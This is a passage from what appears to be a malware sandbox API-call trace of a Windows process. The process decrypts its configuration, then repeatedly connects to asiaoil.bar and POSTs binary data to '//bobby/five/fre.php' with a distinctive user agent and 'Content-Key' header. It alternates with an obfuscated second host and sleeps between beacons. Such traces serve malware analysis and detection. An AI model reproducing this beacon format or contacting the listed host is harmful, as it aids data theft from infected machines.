out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.973] GetProcessHeap () returned 0x740000 [0306.973] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c070 | out: hHeap=0x740000) returned 1 [0306.974] GetProcessHeap () returned 0x740000 [0306.974] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0306.974] GetProcessHeap () returned 0x740000 [0306.974] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763980 | out: hHeap=0x740000) returned 1 [0306.974] GetProcessHeap () returned 0x740000 [0306.974] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7636f8 [0306.975] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.975] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.981] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.981] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d430) returned 1 [0306.991] GetProcessHeap () returned 0x740000 [0306.991] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0306.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.992] CryptImportKey (in: hProv=0x75d430, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0306.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.993] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.994] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.994] GetProcessHeap () returned 0x740000 [0306.994] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0306.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.995] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7636f8, pdwDataLen=0x19fcfc | out: pbData=0x7636f8, pdwDataLen=0x19fcfc) returned 1 [0306.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.996] CryptDestroyKey (hKey=0x74d768) returned 1 [0306.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0306.997] CryptReleaseContext (hProv=0x75d430, dwFlags=0x0) returned 1 [0306.997] GetProcessHeap () returned 0x740000 [0306.997] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x766588 [0306.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.998] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0306.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0306.999] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0306.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.001] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0307.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.002] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0307.002] GetProcessHeap () returned 0x740000 [0307.002] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdf0 [0307.002] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0307.003] GetProcessHeap () returned 0x740000 [0307.003] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b670 [0307.003] socket (af=2, type=1, protocol=6) returned 0x2cc [0307.004] connect (s=0x2cc, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0307.032] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c250*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0307.033] GetProcessHeap () returned 0x740000 [0307.033] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d8f8 [0307.033] GetProcessHeap () returned 0x740000 [0307.033] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0307.033] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.034] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0307.034] GetProcessHeap () returned 0x740000 [0307.034] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0307.034] GetProcessHeap () returned 0x740000 [0307.035] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.035] GetProcessHeap () returned 0x740000 [0307.035] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d70 [0307.035] GetProcessHeap () returned 0x740000 [0307.035] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0307.036] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.037] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0307.037] GetProcessHeap () returned 0x740000 [0307.037] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0307.037] GetProcessHeap () returned 0x740000 [0307.037] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.037] send (s=0x2cc, buf=0x747928*, len=243, flags=0) returned 243 [0307.038] send (s=0x2cc, buf=0x761fd0*, len=159, flags=0) returned 159 [0307.038] GetProcessHeap () returned 0x740000 [0307.038] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0307.038] recv (in: s=0x2cc, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0307.141] GetProcessHeap () returned 0x740000 [0307.141] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0307.142] GetProcessHeap () returned 0x740000 [0307.142] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0307.142] GetProcessHeap () returned 0x740000 [0307.142] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0307.142] GetProcessHeap () returned 0x740000 [0307.142] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0307.142] closesocket (s=0x2cc) returned 0 [0307.143] GetProcessHeap () returned 0x740000 [0307.143] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0307.143] GetProcessHeap () returned 0x740000 [0307.144] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0307.144] GetProcessHeap () returned 0x740000 [0307.144] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0307.144] GetProcessHeap () returned 0x740000 [0307.144] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0307.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x107c) returned 0x2cc [0307.147] Sleep (dwMilliseconds=0xea60) [0307.148] GetProcessHeap () returned 0x740000 [0307.148] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0307.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.150] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0307.167] GetProcessHeap () returned 0x740000 [0307.167] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0307.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.168] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0307.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.320] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.322] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.322] GetProcessHeap () returned 0x740000 [0307.323] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0307.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.324] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0307.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.325] CryptDestroyKey (hKey=0x74d768) returned 1 [0307.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.326] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0307.326] GetProcessHeap () returned 0x740000 [0307.327] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0307.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.328] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.329] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.330] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.332] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.332] GetProcessHeap () returned 0x740000 [0307.332] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0307.332] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.332] GetProcessHeap () returned 0x740000 [0307.333] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0307.333] GetProcessHeap () returned 0x740000 [0307.333] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0307.333] GetProcessHeap () returned 0x740000 [0307.333] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0307.333] GetProcessHeap () returned 0x740000 [0307.333] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0307.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0307.354] GetProcessHeap () returned 0x740000 [0307.354] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0307.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.355] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0307.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.355] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.356] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.356] GetProcessHeap () returned 0x740000 [0307.357] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0307.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.358] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0307.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.359] CryptDestroyKey (hKey=0x74d768) returned 1 [0307.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.360] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0307.360] GetProcessHeap () returned 0x740000 [0307.360] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0307.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.361] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0307.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.362] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0307.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.363] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0307.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.364] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0307.364] GetProcessHeap () returned 0x740000 [0307.364] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0307.364] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0307.366] GetProcessHeap () returned 0x740000 [0307.366] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0307.366] socket (af=2, type=1, protocol=6) returned 0x2d0 [0307.366] connect (s=0x2d0, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0307.391] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0307.391] GetProcessHeap () returned 0x740000 [0307.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0307.391] GetProcessHeap () returned 0x740000 [0307.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0307.393] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.394] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0307.394] GetProcessHeap () returned 0x740000 [0307.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0307.394] GetProcessHeap () returned 0x740000 [0307.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.395] GetProcessHeap () returned 0x740000 [0307.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0307.395] GetProcessHeap () returned 0x740000 [0307.395] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0307.395] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0307.396] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0307.397] GetProcessHeap () returned 0x740000 [0307.397] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0307.397] GetProcessHeap () returned 0x740000 [0307.397] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0307.397] send (s=0x2d0, buf=0x747928*, len=243, flags=0) returned 243 [0307.398] send (s=0x2d0, buf=0x761fd0*, len=159, flags=0) returned 159 [0307.398] GetProcessHeap () returned 0x740000 [0307.398] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0307.398] recv (in: s=0x2d0, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 563 [0307.516] GetProcessHeap () returned 0x740000 [0307.516] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0307.516] GetProcessHeap () returned 0x740000 [0307.516] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0307.517] GetProcessHeap () returned 0x740000 [0307.517] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0307.517] GetProcessHeap () returned 0x740000 [0307.517] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0307.517] closesocket (s=0x2d0) returned 0 [0307.518] GetProcessHeap () returned 0x740000 [0307.518] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0307.518] GetProcessHeap () returned 0x740000 [0307.519] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0307.519] GetProcessHeap () returned 0x740000 [0307.519] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0307.519] GetProcessHeap () returned 0x740000 [0307.519] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0307.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1080) returned 0x2d0 [0307.521] Sleep (dwMilliseconds=0xea60) [0307.523] GetProcessHeap () returned 0x740000 [0307.523] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0307.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.525] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.531] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0307.538] GetProcessHeap () returned 0x740000 [0307.538] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0307.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.540] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0307.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.541] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.564] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.564] GetProcessHeap () returned 0x740000 [0307.564] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0307.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.565] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0307.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.566] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0307.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0307.567] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0307.568] GetProcessHeap () returned 0x740000 [0307.568] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0307.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.569] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.570] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.571] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0307.572] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.572] GetProcessHeap () returned 0x740000 [0307.572] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0307.572] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.573] GetProcessHeap () returned 0x740000 [0307.573] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0307.573] GetProcessHeap () returned 0x740000 [0307.573] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0307.573] GetProcessHeap () returned 0x740000 [0307.574] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0307.574] GetProcessHeap () returned 0x740000 [0307.574] RtlAllocateHeap 